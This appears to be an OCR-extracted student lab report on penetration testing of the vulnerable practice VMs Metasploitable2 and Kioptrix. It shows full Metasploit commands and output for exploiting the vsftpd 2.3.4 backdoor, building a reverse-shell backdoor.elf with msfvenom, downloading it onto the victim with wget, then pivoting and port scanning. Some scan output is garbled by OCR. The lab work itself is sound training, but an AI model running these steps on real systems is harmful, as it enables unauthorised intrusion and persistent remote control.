I /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog/ FCKeditor File U

plead
I /admin/jscript/upload.html: Lizard Cart/Remote File upload
_ /webdav/: Potentially interesting folder
http-slowloris-check:
VULNERABLE:
Slowloris DOS attack
State: LIKELY VULNERABLE
IDs: CVE:CVE-2007-6750
Slowloris tries to keep many connections to the target web server open and hold
them open as long as possible. It accomplishes this by opening connections to
the target web server and sending a partial request. By doing so, it starves
the http server's resources causing Denial Of Service.

Disclosure date: 2009-09-17

References:
http://ha.ckers.org/slowloris/
I_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Host script results:

l_smb-vuln-msl0-054: false
l_smb-vuln-msl0-061: false
l_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds

The above output shows the list of vulnerabilities and they are as follows:
actually with the below output result and we will do vulnerability analysis via FTP (vsftpd
service)

PORT STATE SERVICE

21/tcp open ftp
I ftp-vsftpd-backdoor:

I! VULNERABLE:
U vsFTPd version 2.3.4 backdoor

18
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
I State: VULNERABLE (Exploitable)
l_sslv2-drown:

The attack Procedure:

We can see that the vulnerability was allegedly added to the vsftpd archive between the dates
mentioned in the description of the module.
The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in
opening the backdoor on port 6200 of the system.

Exploitation of VSFTPD 2.3.4 Backdoor

After modeling threats, let us load the matching module into Metasploit using the use
exploitlunix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info
command as follows:

(vlpachi7©kali)-[ ~/Desktop/vapt-report-metasploitable2]
L$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > search vsftpd

Matching Modules

# Name Disclosure Date Rank Check Description

0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor

Command Execution

Interact with a module by name or index. For example info 0, use O or use exploit/unix/ftp/vsftpd_234_
backdoor

msf6 >
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info

Name: VSFTPD v2.3.4 Backdoor Command Execution

Module: exploit/ unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03

Provided by:
hdm
MC

19
 e
1
Available targets:
Id Name
Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

0 Automatic

Check supported:
No

Basic options:
Name Current Setting Required Description
I · ·
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 21 yes The target port (TCP)

Payload information:
Space: 2000
Avoid: 0 characters

Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.

References:
OSVDB (73573)
http://pastebin.com/AetT9sSS
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Now we are going to add RHOST, RPORT, show payload, use payload and check about these
options & finally we will exploit...
We can see that the vulnerability was allegedly added to the vsftpd archive between the dates
mentioned in the description of the module
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

V Name Current Setting Required Description

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<

I RPORT 21 yes The target port (TCP)

Payload options (cmd/unix/interact):

Name Current Setting Required Description

Exploit target:

20
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
I 0 Automatic

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120

RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads

# Name Disclosure Date Rank Check Description

0 payload/ cmd/ unix/interact normal No Unix Command, Interact with Established Co

nnection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact

payload = > cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

And as you can after exploiting we can do many things but one thing is that one problem here and
problem is how to maintain accessability with these exploitation because after exit from the
exploitation then it will destroy the session and after that we have to exploit again to get access or
run the command

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[ +] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[ +] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +05
30

whoami
root
pwd
I
Is
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc

21
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Is -la
total 125
drwxr-xr-x 21 root root 4096 May 20 2012 .
drwxr-xr-x 21 root root 4096 May 20 2012 ..
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13500 Jul 9 13:48 dev
drwxr-xr-x 94 root root 4096 Jul 9 14:41 etc
drwxr-xr-x 7 root root 4096 Jun 2 05:32 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw------- 1 root root 41871 Jul 9 13:49 nohup.out
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
dr-xr-xr-x 118 root root 0 Jul 9 13:48 proc
drwxr-xr-x 13 root root 4096 Jul 9 13:49 root
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 12 root root 0 Jul 9 13:48 sys
drwxrwxrwt 4 root root 4096 Jul 9 14:07 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 14 root root 4096 Mar 17 2010 var
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Post Exploitation

After gaining knowledge about this vulnerability and gaining access, let us now exploit once
again because we want to access of this vuln to maintain and undercover control in ownself. Let
us now exploit the target system. Let us see what options we need to set before firing the exploit
onto the target. we can do this by running the show options command, as shown following..

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<

RPORT 21 yes The target port (TCP)

22
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Payload options (cmd/unix/interact):

Name Current Setting Required Description

Exploit target:

Id Name

0 Automatic

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120

RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads

# Name Disclosure Date Rank Check Description

0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Co

nnection

We can see that we have only two options, which are RHOST and RPORT, we set RHOSTas
the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.

Next we can check for the matching payloads via the show payloads command to see what
payloads are suitable for this particular exploit module.we can see only a single payload which
is payload/cmdlunixlinteract. We can use this payload using the set
payload cmd/unixlinteract command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact

payload = > cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[ +] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[ +] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +05
30

whoami
root
pwd
I

23
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

We got it we goot root access to the target system. So, what's next? Since wehave got a simple
shell, let us try gaining better control over the target by spawning a meterpreter shell.

In order to maintain the access and meterpreter shell, we need to create a client-oriented payload,
upload it to the target system, and execute it.

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152

LPORT=4444 -f elf> backdoor.elf

This is own IP 192.168.43.152

f r-(v1pachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ Is
ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
r-(v1pachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$
r-(v1pachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= 192.168.43.152 LPORT=4444 -f e
If > backdoor.elf
[sudo] password for hackerboy:
[-] No platform was selected, choosing Msf::Module: :Platform: :Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
I
r-(v1pachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ Is
backdoor.elf ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
r-(v1pachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$

We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the
preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define
our IP address and port number that backdoor.elf file will connect to in order to provide us
meterpreter access to the target. The -f switch defines the output type, and elf is the default
extension for the linux-based systems.

But what happened next, We will maintain access to meterpreter shell through exploit and if you
say, with the help of apache server on our system, we will upload the shell to the victim's system.

If your Victim is on another network means away from you, then we can buy and host a server
for this and then upload it onto the target machine.

24
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ sudo service apache2 start
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
L$ sudo mv backdoor.elf /var/www/html/
r-(vlpachi7©kali)-[~/Desktop/vapt-report-metasploitable2]
UL$
We run the apache service via the service apache2 start command and move the backdoor file
into the default document root directory of the Apache server. Let us now download the file
from our Apache server onto the victim system.

whoami
root
pwd
I
I
wget http:f/192.168.43.152/backdoor.elf
--16:06:29-- http:f /192.168.43.152/backdoor.elf
=> 'backdoor.elf'
Connecting to 192.168.43.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

100% 7.65 MB/s

16:06:29 (7.65 MB/s) - 'backdoor.elf' saved [207/207]

We can download the file via the wget command, as shown in the preceding screenshot. Now, in
order to allow the victim system to communicate with Metasploit, we need to set up an exploit
handler on our system. The handler will allow communication between the target and Metasploit
using the same port and payload we used in the backdoor.elf file.

2 Method : File uploading Method

We can upload a backdoor in our victim's machine by python's http.server

r-(vlpachi7©kali)-[/var/www/html/backdoor]
L$ python3 -m http.server 1234 1 X
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 -

and after then, in out victim's machine , we get a backdoor file via wget command

whoami
root
pwd
I
wget http://127.0.0.1/backdoor.elf

25
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

--2021-07-10 00:47:02-- http://127.0.0.1/backdoor.elf

Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: 'backdoor.elf'

We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type
as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and
LHOST as our local IP address. We can now run the module using the exploit command and wait
for the incoming connections.

(vlpachi7©kali)-[ ~/Desktop/vapt-report-metasploitable2]
L$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT = > 4444
msf6 exploit(multi/handler) > set LHOST 192.168.43.152
LHOST => 192.168.43.152
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444

"C[-] Exploit failed [user-interrupt]: Interrupt
[ -] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler...

When we download the file onto the target, we provide appropriate permissions to the file via the
chmod command, as shown in the following screenshot:

chmod 777 backdoor.elf

Is -la
total 129
drwxr-xr-x 21 root root 4096 Jul 9 16:18 .
drwxr-xr-x 21 root root 4096 Jul 9 16:18 ..

26
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

./backdoor .elf

Providing the 777 permission will grant all the relevant read, write, and execute permissions on
the file. Execute the file, and now switch to the other terminal, which is running our exploit
handler:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444

AC[-] Exploit failed [user-interrupt]: Interrupt
[ -] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444

[*] Sending stage (984904 bytes) to 192.168.43.120
[*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:4
9:15 +0530

meterpreter >

We got it, we got the meterpreter shell acces to the target. Lets find some interesting information
using the post exploitation modules:

Computer : metasploitable.localdomain

meterpreter > ifconfig

Running the sysinfo command, we can see that the target is metasploitable (an intentionally
vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.

meterpreter >

27
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
meterpreter > ifconfig

Interface 1

Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
1Pv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface 2

Name : eth0
Hardware MAC : 08:00:27:67:67:30
MTU 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address: 192.168.43.120
IPv4 Netmask : 255.255.255.0
IPv6 Address: 2409:4064:228d:76cd:a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80: :a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter >

Running the ifconfig command on the target, we see pretty interesting information, such as an
additional network interface, which may lead us to the internal network on which the internal
systems may reside. We run the arp command on the target and check if there are some systems
already connected or were connected to the exploited system from the internal network, as shown
in the following screenshot:

meterpreter > arp

ARP cache

IP address MAC address Interface

192.168.43.152 fc:01:7c:29:00:77

meterpreter >

We can clearly see an additional system with IP address 192.168.43.120 on the internal network.
Approaching the internal network, we need to set up pivoting on the exploited machine using the
autoroute command.

meterpreter > run autoroute -p

[*] No routes have been added yet

meterpreter >

28
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

[*] Adding a route to 192.168.43.120/255.255.255.0...

Active Routing Table

Subnet

192.168.43.120 255.255.255.0 Session 1

meterpreter >

The autoroute -p command prints all the routing information on a session. We can see we do not
have any routes by default. Let us add a route to the target internal network using the autoroute -s
192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got
successfully added to the routing table, and now all the communication from Metasploit will pass
through our meterpreter session to the internal network.

Let us now put the meterpreter session in the background by using the background command as
follows:

meterpreter > background

[*] Backgrounding session 1...
msf6 exploit(multi/handler) > hosts

Hosts

address mac name os_name os_flavor os_sp purpose info

comments

192.168.43.120 fc:01:7c:29:00:77 metasploitable Linux Server

msf6 exploit(multi/handler) >

Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120
system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:

msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description

CONCURRENCY 10 yes The number of concurrent ports to check per host

DELAY O yes The delay between connections, per thread, in milliseconds

29
e
r JITTER
iseconds.
0 yes
Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
The delay jitter factor (maximum value by which to+/- DELAY) in mill

PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)

I RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'fil
e:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
I
msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
RHOSTS => 192.168.43.0
msf6 auxiliary(scanner/portscan/tcp) > run

[*] 192.168.43.0: - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
RHOSTS = > 192.168.43.120
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.43.120: - 192.168.43.120:22 - TCP OPEN

[ +] 192.168.43.120: - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:25 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:53 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:111 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:139 - TCP OPEN
I[+] 192.168.43.120: - 192.168.43.120:445 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:514 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:512 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1099 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:1524 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:2049 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:2121 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:3632 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5432 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:5900 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:6000 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6200 - TCP OPEN
[ +] 192.168.43.120: - 192.168.43.120:6667 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:6697 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8009 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8180 - TCP OPEN
[+] 192.168.43.120: - 192.168.43.120:8787 - TCP OPEN
[*] 192.168.43.120: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >

Running the port scan module will require us to set the RHOSTS option to the target's IP address
using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value
to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and
again.

In order to run this module, we need to issue the run command. We can see from the output that

30
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
there are multiple services running on the 192.168.43.120 system. Additionally, we can see that
port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary
module, auxiliary/scanner/http/http_version, as follows:

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version

msf6 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

Name Current Setting Required Description

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOSTS 192.168.43.120 yes The target host(s), range CIDR identifier, or hosts file with synt
ax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host

msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120

RHOSTS = > 192.168.43.120
msf6 auxiliary(scanner/http/http_version) > run

[ +] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >

Running the auxiliary module, we find that the service running on port 80 is the popular Apache
2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can
allow an attacker to gain access over the target system.

CONCLUSION: We successfully implemented VAPT on Metasploitable2

31
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
EXPERIMENT NO 3
AIM: Kioptrix Level 1: Vulnerability Assessmentand Penetration Testing
THEORY:

Scope & Initial Planning

Scope is a very important piece of our puzzle when we are doing an assessment. We need to
understand what is important to the client/customer, what piece of data and information could
be devastating to the business if an attacker got a hold of it. For our purposes, our scope will
be anything involved with the Kioptrix box. That means any open ports/services are fair
game.

Recon - Information Gathering

Kioptrixis a vulnerable Red Hat Virtual Machine from VulnHub in which our goal is to gain
root level access to the machine. It will work in both VMware Workstation and VirtualBox.
We must first find the machine, let's start by seeing what is on our network:

# Lets find our IP Address using the ip command

ip a

# We can also find our IP with ifconfig

ifconfig

# Now we use the first 3 octects to search

netdiscover -r 10.0.0.0/24

# Note that you may need to adjust your IP based on the output to something like 192.168.x,
which is a lot more common for local private networks.

I am using VMware Workstation, so in my case I am looking for a VMware Mac address in

the output:

10.0.0.207 1 ij2 VMware Inc.

We found it!

32
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

Scanning & Enumeration

Alright, now that we have an IP address, let's do some scanning on our target host:

/home/rev
10 0.0.107
Sl,lJ"t lOCJ Nrn;,p 7 9] ( http', //nrup ()l'(J ) ,lt 2021-11-20 08 17 risr
h11ap scan report for 10.0.0.207
ost is up (0.G0011s latenry)
P.,ut ::,hum1 65529 clo::,ed purls
POAT STATE SEl'.h'ICE VEAS!Ofl
22/tcp open ".Sh OprnSStt 2 9p2 (p1·otoi:ol I 99)
I ssh-hostkey.
I 10JLJ b8:'l4·6r db fd 8b:en 66 eY la 1b:df Se 6f 6£J 86 ( <;Al)
I 1024 8f:8c·5t.> 81 cd 21:<1b cl 80.C'l 57:a3 3c 85 c4 71 (DSA)
I_ 102£J ed:lle:a'J Lla·06.l<l:ff 15·111·ce·da:3a·88 db·e2:81 (ASA)
I_ sshvl • Serve1· • upport '• SSh•l
88/tcp open http /1pache httpd 1.3.28 ((Unix) (Red-Hat/Linux) 11od_ssl/2.8.'1 OpenSSL/0 9.6b)
I hnp-mPthod<;
I_ Potentially n:.ky methods ,R, CE
!_http-server-header Apache/1 3 20 (Unix) (Red-Hat/Linux) 11od_ssl/2 8 LI OpenSSL/0 9 6b
I _http-tltli': Test r.19e for tht> Ap,lche l'li'b Server on Red ,lt Linu
111/tcp open rpcbrnd 2 (RPC ffl00000)
I rpcinfo:
I program version porl/proto st•rv1cc
I 100000 111/tcp rpcbind
I 100000 111/udp rpcbind
I 10002•1 32768/lcp status
I HJ00:l.:J 3)'168/udp <;tatu<;
139/":.cp open nctb10'..-'..sn S,111b,1 '>"1bd (1'10rkgroup MYGROLP)
111B/tcp open ssl/https Apache/1 3 )0 (Lnix) (Red-Hat/Linux) mod_ssl/2.8.tl OpenSSL/8 9.6b
I http-Si'l'VH-ht>,lrlrr Ap,irht'/1 3 20 (Unid {Rrd-tl,H/llnux) 110<1.ssl/2 8 ll Opt:'nSSL/0.9 6b
I _http-tit le: •18B B-ad Request
I <; <;1 -cPrt • SubjPei commonlloartP=l oc a1host . loci\1domain/ orqi\ni 1 at ionName=So11POrgan i 1at ion/ 'it areOrlJrovi ncPPli\!IIP=<;omest c1te I co
untry•J.imc..c--
Plot •1al1d before 2009-09-26T89:32.06
Pwt v.,l id ,1ftr1· 7010·-09-H,TfJ9 32 06
ssl-date: 2021-ll-20Tl3:18.53"00 00, -2h591153s from scanner tlme.
<i<ilv7·
5Slv2 supportl'd
ciphers·
55L2 RC4 128_U:PORTLJ0_WITI "105
SSL2_RC2_128_CB(_L'IITH MOS
SSl 1 RC 4_ 64 .WI TH MOS
55L2_RC4_ 128 _\oiint_MD5
SSL2_RC2_128_CB(_EXPORT•!B '.r!TH_MDS
SSL]_[)[S_fill_rnr w1rn M05
SSL2_DES_l92_EGE3_CB(_WITH_ '1D5
D'l6H/tcp open 'iti\tU'> 1 (fH>C 11100014)
,-.AC Address: 0G • BC 29 30 FE 33 {V"lw,1re)
Device type: general purpose
Runn111g. Linux 2 ll X
05 CPE: cpe./o:Linux:linux_kernel:2 1J
OS :1Ptail'i l inux J LJ lJ - J 4 18 (lil1ely f'rr.bedded)
hctirnrl< D1st.rncc 1 hop

► •nst script rrsul to;

I _c Lock-skel'I: -2h59rn53s
I nbstat NetBIOS name lOPlAIX, PJetBIOS u<;er: <:unknmm> Net BIOS MAC· <:unkno1m> (unkno,rn)
I _s11b2-t1mc: Protocol ncgot 1,1tlon Lu led (Sl"B2)

One thing I do like to do when I do these scans is to save the output so I can use it later. If
you are scripting, the -oX option outputs as XML, which you can then use to parse the
output: nmap -T4 -p- -A 10.0.0.207 -oX output.xml

Another thing you could do in the sake of saving some time, is to first scan for all ports and
then only probe the ports that came back open with the -A option:

# Scan All Ports:

nmap -T4 -p- 10.0.0.207

# Scan with -A ONLY for the ports found to be open:

nmap -T4 -p 22,80,111,139,443,32768 -A 10.0.0.207

33
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
Let's take a look at the output of our scan and focus on interesting ports and services...
• SSH running on port 22, which will allow us to connect remotely if or when we have

some some creds. - It is running OpenSSH version 2.9p2

• HTTP@ port 80. That means we have a website running from that machine. We'll

have to visit that and take a look! -We also have additional information that the

webserver is running Apache 1.3.20

• netbios-ssn on port 139. We can think SMB and that it will more than likely be very

much worth our while looking into shares.

We should start with the lowest hanging fruit first, let's take a look at the webpage.

Web Server/ Page/ App Enumeration

Let's start by visiting the page:

ou ,nu

The page looks like the default Apache Test Page.

34
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC
We can leverage Wappalyzer (a browser extension) to get some quick additional info from
the page:

♦ Woppalyzer .:i (m IS:

ECH O GIES MORE I FO

eb rv r b

mod ssl 2B

It verifies what Nmap had shared with us about Apache 1.3.20, mod_ssl 2.8.4, and OpenSSL 0.9.6b.
For our next step we can use Nikto, a web server scanner. Depending on the security of the
website we may find the results to be useful or may be not ..... For example, if the server is
running a WAF (Web Application Firewall), the WAF may attempt to drop/block the traffic
and therefore we may not get anything useful out of our scan.

In our case we get some good results:

L$ nikto -h 192.168.153.128 1 X

- Nikto v2. l .6

+ Target IP: 192.168.153.128

+ Target Hostname: 192.168.153.128
+ Target Port: 80
+ Start Time: 2021-11-28 09:12:50 (GMT-8)

forms of XSS

35
 Vidya Vikas Education Trust's
Universal College of Engineering, Kaman Road, Vasai 401208
Accredited B+ Grade by NAAC

There are some interesting findings in the nikto output:

• It found the host might be vulnerable to Cross-Site Tracing (XST) leveraging

the TRACE verb which can allow an attacker to steal user's cookies or present them

with a malicious website using Cross-Site Scripting (XSS) where XSS is code

injection from the client side of the website.

o Reference:

• Apache 1.3.20 -Possible DoS and code execution.

• Apache 1.3.20 - Overflows which could be leveraged with an exploit.

• mod_ssl 2.8.4 - Vulnerable to remote buffer overflow, this one is particularly

interesting

